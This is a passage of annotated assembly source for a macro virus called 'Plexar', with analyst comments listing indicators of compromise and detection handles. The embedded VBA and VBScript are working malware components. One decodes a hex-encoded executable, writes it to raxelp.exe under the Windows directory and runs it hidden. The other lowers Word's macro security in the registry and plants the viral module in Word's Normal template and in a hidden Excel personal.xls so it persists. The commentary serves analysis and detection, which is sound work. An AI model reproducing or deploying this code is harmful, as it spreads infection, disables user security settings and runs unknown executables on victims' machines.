        DB 'End Sub', 0Dh, 0Ah
        DB 'Private Sub Correme()', 0Dh, 0Ah
        DB 'On Error Resume Next', 0Dh, 0Ah
        DB 'Dim joda as String', 0Dh, 0Ah
        DB 'Dim X as String', 0Dh, 0Ah
        DB 'joda = "'                            ; hex-encoded PE is appended at run time
L_Virus_Macro EQU $-Virus_Macro                 ; length of this fragment
|
|||
|
|
|||
|
; VBA module "Plexar", second fragment: the rest of Correme. Turns the hex
; string joda back into bytes two characters at a time, writes them with
; Open/Put (Binary) to %windir%\raxelp.exe and starts it with Shell(..., 0)
; (hidden window).
; Analyst note: an Office process writing an executable under %windir% and
; spawning it is a high-fidelity behavioural indicator; the file name
; raxelp.exe is the host IoC.
Virus_Macro_2 LABEL NEAR
        DB 'For o = 1 to Len(joda) Step 2', 0Dh, 0Ah
        DB 'X = X + Chr("&h" + Mid(Joda, o, 2))', 0Dh, 0Ah      ; "&hNN" -> byte
        DB 'Next', 0Dh, 0Ah
        DB 'raxname = Environ("windir") & "\raxelp.exe"', 0Dh, 0Ah
        DB 'Open raxname For Binary As #1', 0Dh, 0Ah
        DB 'Put #1, 1, X$', 0Dh, 0Ah
        DB 'Close #1', 0Dh, 0Ah
        DB 'xoxo = Shell(raxname, 0)', 0Dh, 0Ah                 ; window style 0 = hidden
        DB 'End Sub', 0Dh, 0Ah
L_Virus_Macro_2 EQU $-Virus_Macro_2             ; length of this fragment
|
|||
|
|
|||
|
Nihil DB 00h                            ; single zero byte (an empty string, presumably)
Memoria DD 00000000h                    ; memory pointer (memoria = memory); use not visible
Raxelp_$$$ DB "c:\raxelp.$$$", 00h      ; exported VBA module file (see Macro_VBS) - host IoC
Plxwrd_vbs DB "plxwrd.vbs", 00h         ; presumably the file name Macro_VBS is dropped as - host IoC
|
|||
|
|
|||
|
; VBScript that seeds the Office component. Automates Word through COM,
; writes 1 to HKCU\Software\Microsoft\Office\9.0 and 8.0\Word\Security\Level
; (lowest macro security), and imports c:\raxelp.$$$ - the exported "Plexar"
; module - into NormalTemplate's VBProject if no component by that name is
; present. Then, through Excel, creates a hidden personal.xls in the startup
; path with the same module if it does not exist, and quits Excel.
; Analyst notes: the `word <> ""` / `excel <> ""` tests are not real object
; checks and only pass because of 'On Error Resume Next'. Detection handles:
; wscript.exe automating Word/Excel via COM, writes to the Office
; Security\Level values, and VBProject.VBComponents.Import of
; c:\raxelp.$$$.
Macro_VBS LABEL NEAR
        DB 'On Error Resume Next', 0Dh, 0Ah
        DB 'Set word = CreateObject("Word.Application")', 0Dh, 0Ah
        DB 'If ( word <> "" ) Then', 0Dh, 0Ah
        DB 'word.System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = "1"', 0Dh, 0Ah
        DB 'word.System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Security", "Level") = "1"', 0Dh, 0Ah
        DB 'Set maca = word.Application.NormalTemplate.VBProject.VBComponents', 0Dh, 0Ah
        DB 'If maca.Item("Plexar").Name <> "Plexar" Then', 0Dh, 0Ah
        DB 'maca.Import "c:\raxelp.$$$"', 0Dh, 0Ah
        DB 'word.Application.NormalTemplate.Save', 0Dh, 0Ah
        DB 'End If', 0Dh, 0Ah
        DB 'End If', 0Dh, 0Ah
        DB 'Set fso = CreateObject("Scripting.FileSystemObject")', 0Dh, 0Ah
        DB 'Set excel = CreateObject("Excel.Application")', 0Dh, 0Ah
        DB 'If ( excel <> "" ) Then', 0Dh, 0Ah
        DB 'yyy = excel.Application.StartupPath & "\personal.xls"', 0Dh, 0Ah
        DB 'If (fso.FileExists(yyy) = False) Then', 0Dh, 0Ah
        DB 'excel.WorkBooks.Add.SaveAs yyy', 0Dh, 0Ah
        DB 'excel.Application.ActiveWorkbook.VBProject.VBComponents.Import "c:\raxelp.$$$"', 0Dh, 0Ah
        DB 'excel.ActiveWindow.Visible = Not -1', 0Dh, 0Ah
        DB 'excel.Workbooks("personal.xls").Save', 0Dh, 0Ah
        DB 'End If', 0Dh, 0Ah
        DB 'excel.Application.Quit', 0Dh, 0Ah
        DB 'End If', 0Dh, 0Ah
Largo_MVBS EQU $-Macro_VBS                      ; length of the script
|
|||
|
|
|||
|
; File handle, mapping handle and map base for the dropper PE (DPE, the
; DROPPER image that follows); the code using them is outside this view.
FHandle_DPE DD 00000000h
MHandle_DPE DD 00000000h
BaseMap_DPE DD 00000000h
|
|||
|
|
|||
|
DROPPER LABEL NEAR
|
|||
|
|
|||
|
DB |